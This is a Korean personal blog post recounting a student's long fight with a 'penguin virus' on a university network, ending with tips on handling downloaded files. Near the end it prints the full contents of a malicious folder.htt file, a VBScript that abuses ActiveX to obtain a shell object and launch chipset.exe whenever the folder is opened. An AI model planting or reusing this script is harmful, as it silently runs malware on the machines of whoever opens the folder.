반응형
우리 학교에 춘삼월 봄바람이 불어올라고 딱 폼잡고 개강하여 파릇파릇한 신입생들이 와서 돌아다니는 시점에 복잡한 일이 하나 벌어졌다.

뭔고 하니 펭귄바이러스(일명 : 짱께 바이러스) 라고 하는 악성 바이러스가 학교내부에 퍼진것이다.

이 바이러스의 특징은 일단 웹페이지를 열면 펭귄그림이 들어있는 광고가 뜬다.
거기 써있는 언어가 중국어라서 짱께바이러스라고도 불리운다.

사용자 삽입 이미지


그런데 이것이 처음에는 그냥 원하는 페이지 대신 광고가 나오는 증상인데
점점 악화되면

  • 무한 재부팅.
  • 윈도우창 무한대로 뜨기.
  • Task Manager가 메모리 점유 급상승.
  • 윈도우 무한 느려지기.

등등의 증상이 일어난다.

ㄷㄷㄷ~
처음엔 학교 유선 랜에서만 전파되다가 학교 무선랜까지 옮겨졌다.

학생회관과 기숙사를 거쳐 -> 1공학관 -> 소울관 학교 전역으로 퍼져 나갔다.

나도 동아리방에서 무선인터넷을 사용하다가 내컴퓨터(지금까지 백신이라고는 V3 Neo 밖에 써본적 없음. 바이러스 청정 컴이라고 자부.)에도 펭귄이 뜨는것이었다.
냉큼 무선랜을 끄고 인터넷을 HSDPA로 연결하고 나서는 별 증상이 안일어 났다.

며칠 뒤에 또 무선랜으로 이러닝수업을 듣다가 플래쉬 뒤에 떡! 하니 펭귄배너가 나타났다.
무서워서 이러닝이고 뭐고 다 끄고 다시 HSDPA로 접속. 그 뒤로는 안나온다.

그래서 난 컴퓨터 내부에 걸리는게 아니라 네트워크 상에서 마치 fishing 하는것 처럼 되는건가 보네? 하고서 학교 게시판에 포맷하고 난리치지 말라고 글을 올렸었다.

그런데 그게 아니네. (그때 잘못된 정보 올려서 대단히 죄송합니다 ㅠ.ㅠ)

그뒤로 혹시나 해서 다른 인터넷 싸이트를 돌아다니면서 펭귄에 대해 조사를 좀 해봤는데
  • 다른 학교에서도 펭귄에 감염되어서 고생했다.
  • 자기네 학교도 안철수에 의뢰하였으나 고치지 못했다.
  • 잘잡는다고 소문난 Kaspersky, Nod32, Avast, Anti-Virus등등 진단은 하지만 고치지 못했다.
이런 반응이었다.

그런데....

엇그저께 아파트에서 게임을 하고 있는데 동아리 후배가 놋북을 들고 오더니
"형~ 저 펭귄 걸려서 노트북 포맷하고 가져왔어요~" 이랬다.

그러더니 집에와서 인터넷 하는데 펭귄이 나타나는거다. ㄷㄷㄷ
어떻게 포맷까지 했는데 펭귄이 나오는거지?

바이러스 청정지역인 우리 아파트에 바이러스를 들고 오다니.
일단 감염을 우려해 같은 공유기에 물려있는 컴퓨터를 다 껐다.
인터넷은 HSDPA로 접속해서 썼다.

오기가 발동했다.

이놈 잡아야겠다.!!!

일단 윈도우CD에 이미 감염되어 있던것이 아닌가 하여 효진이 노트북을 붙들고 일단 C드라이브에 윈도우를 재설치 했다.

30분정도 설치 하여 완료! 처음 까니까 역시 잘 되는구나.
그리고서 드라이버 이것저것 설치하고 인터넷 테스트~

헉!!!
또나와 씨바!!

뭐야 이거!!!

뭔가 숙주가 컴퓨터 내부에 있는것이 확실하다고 느꼈다.

학교에서 안철수 연구소에서 특별 주문 제작했다는 펭귄잡는 백신을 돌렸다.
몇개의 파일이 검사되고 삭제하려했는데 삭제가 안된다.

이미 작동중이라 그런가보군....

  • 어떤 프로세스가 작동중인지를 보려고 task manager를 띄우자 taskmanager 메모리 점유 기하급수적으로 증가!
  • 다른 백신 설치도 불가 (설치 시도하면 에러나고 꺼짐)
  • 프로세스 중에 smss.exe 가 있길래 이놈이 뭐하는건지 찾아보려고 익스플로러에 검색했는데 다른건 다 검색 되는데 smss.exe라고 치면 에러나면서 꺼짐.
  • 혹시나 파이어폭스로 해서 검색해볼까 해서 파이어폭스 설치후 smss.exe 검색 하자마자 또 꺼짐.....
별별 짓을 해도 바이러스라고 알려진 파일을 삭제할수 없어서
이번에는 다른방법을 사용했다.

이미 억세스중인 파일도 연결상태 해제하고 삭제할수 있는 Unlocker를 이용하여 연결해제 하고 삭제 하려 하였다.
그래서 지우고 재부팅 하였는데

또나와 썁쑐레이숀!!!!

이건 뭐야! 도데체 @_@;;

아무래도 안되겠다. 그래서 C드라이브를 다시 밀고 윈도우 재설치
혹시 D드라이브에 뭔가 있는게 아닐까?

하는 생각이 뇌리를 스쳐지나갔다.

그래서 이번에는 C를 포맷해버리고 NTFS 지원하는 DOS로 들어가서 파일을 삭제하기로 했다.

DOS로 부팅....
이거 중학교때 써보고 안썼던 도스 명령어가 잘 생각이 나지 않는다. @_@;;;; (기억력 감퇴 현상)
일단 D 드라이브 루트에 숨겨진 파일을 지우고자
모든 속성을 다 풀어버렸다. (속성 푸는 명령어를 잊어버려가지고 인터넷에서 찾았음 ㅋㅋㅋ 옛날에 밥먹듯이 치던건데..)
그러고 나서 삭제~

이번엔 되겠지?

윈도우를 설치했다.
역시나 처음 깔면 잘 된다.

그리고 나서 드라이버 설치...

오예~ 이번엔 잘 되는걸?~

그래서 내가 최근에 발견한 큰 휴지통(
MytrashCan 휴지통을 예쁘게

MytrashCan 휴지통을 예쁘게 ~ 오른쪽 영상은 HDTV 수신카드로 HD 보는 중. 은근 자랑~


도 깔고
스킨도 받아서 깔고~
윈도우 아이콘도 세팅하고~

윈도우를 꾸미면서 펭귄 없어졌구나 ~ 즐겁게

한참 하고 있는데~

또나와 @_@

그래서 망연자실 하고 있는데 같이 사는 형이 밤늦게 들어와서 보더니 자기는 랩에서 Avast 백신 깔아서 다 잡았다고 그러는 거다.
그래서 뭐 또 Avast 깔았지....

재부팅 하고나서 바이러스 한나절 검색했는데 파일 몇개 지우더니 고대로 또나오는거다.
오늘은 GG~

일단 너무 졸려서 잤다.

다음날 노트북 주인 효진이는 동아리 MT 사전답사를 떠나고

난 눈뜨자 마자 홀연히 일어나 앉아 다시 재도전을 하기 시작했다.


아! 그러고 보니 전날에 발견한것중에 이상한 것이 있는데.
이 바이러스가 활성화 되면 폴더 옵션중에
보호된 운영체제  숨기기(권장)

폴더옵션에 나오는 보호된 운영체제 파일 숨기기(권장)


이부분이 없어진다.


이부분에 관한 내용 은 More를 눌러서 보시고...


아무튼간 저 옵션이 없어져버리니까
이게 바이러스 파일이 윈도우에 있는지~ 없는지~ 도 모르고 ....
그래서 토탈커맨더 까지 깔아가면서 숨겨진 파일을 찾아 지웠었다. (어제)

분명이 D드라이브에 뭔가 있다는 생각이 들었다.

이번엔 DOS가 아닌 윈도우 PE로 부팅해서 D드라이브를 샅샅히 뒤졌다.
D 에 숨겨진 System Volume Information 디렉토리도 혹시나 해서 지우고 의심스러운것은 다 지웠다.

그리고 이번엔 AVG라는 백신을 받아두었다.

그리고 C드라이브를 다시 밀고 윈도우 설치.
윈도우를 설치하자마자 AVG를 깔았다. (아무 드라이버도 설치 안하고)
그리고 백신을 돌리니까 뭔가 파일을 잡는거다.

아까 생각하길.... 윈도우깔고 드라이버만 깔았는데 바이러스가 걸렸다면 드라이버파일에 감염된게 아닐까.... 하고 생각중이었다.

그런데 AVG가 드라이버파일이 들어있던 디렉토리에서 뭔가 이상한 파일을 발견하고는 삭제하란다.

folder.htt 라는 파일을 바이러스 라고 잡아내었다.
이 파일의 내용을 보려고 열어보았다.
내용은 다음과 같다.
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
</head>
<body style="margin: 0" scroll=no>
<object id=FileList border=0 tabindex=1
classid = "clsid:1820FED0-473E-11D0-A96C-00C04FD705A2"
style="width: 100%; height: 100%" tabIndex=-1>
</object>
</body>
</html>
<script language=vbscript>
document.write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><APPLET NAME=L HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET></div>"
</script>
<script language=vbscript>
On Error Resume Next
Dim path
Path = ""
Path = Left(document.location, Len(document.location) - 11)
Path = Mid(Path, 9)+"/"
Set AppleObject = document.applets("l")
AppleObject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
AppleObject.createInstance()
sd="w"+"sshe"+"ll"
Set sd = AppleObject.GetObject()
sd.run(Path + "chipset.exe")
</script>

오오오~~~~!!! 이건가?

하는 느낌이 들었다. 그리고 그 파일들을 삭제하고 드라이버를 재설치.


완벽 제거 되었다.!!!!!

펭귄 완전 박멸!!! 쾌거!

윈도우 설치한 한 댓번은 한것 같다.
미친 펭귄 바이러스....

이제 알겠다.
펭귄바이러스를 치료하기 위해서는 클린 부팅후에 해당 파일을 삭제하면 된다.


아차! 그리고 펭귄 예방법
주워 듣기로는 펭귄에 감염되면 인터넷에서 어떤 파일을 다운 받을때 다운 받는 파일이 바꿔치기 당한다고 한다.

내 생각에는 그 바꿔치기 당한 파일을 실행하면 감염되는것 같다.

모든일이 일어나는 것에는 원인이 있기 마련
난 인터넷 서핑만 하는데 바이러스에 걸릴 이유가 없다.
뭔가를 설치 했다는 이야기다. 나도 펭귄과 두번이나 맞닥드렸지만 내컴퓨터는 멀쩡하다.

그러니까 인터넷에서 파일을 다운 받을 경우 파일명을 꼭 확인하고 실행하고 (파일명이 이상하면 실행하면 안되겠다)

혹시 다운받은 파일이 자동풀림 .exe 압축파일일 경우에는 자동풀림을 실행하지 말고 압축프로그램 (개인적으로는 Winrar이나 7-zip 추천 알집 비추) 으로 풀어서 사용하기 바란다.
반응형

'삶의 지혜' 카테고리의 다른 글

치킨게임  (0) 2008.04.01
종이로 CD케이스 접기  (0) 2008.03.18
DVD레코더 종류별특성 정리  (0) 2008.03.18
Posted by Real_G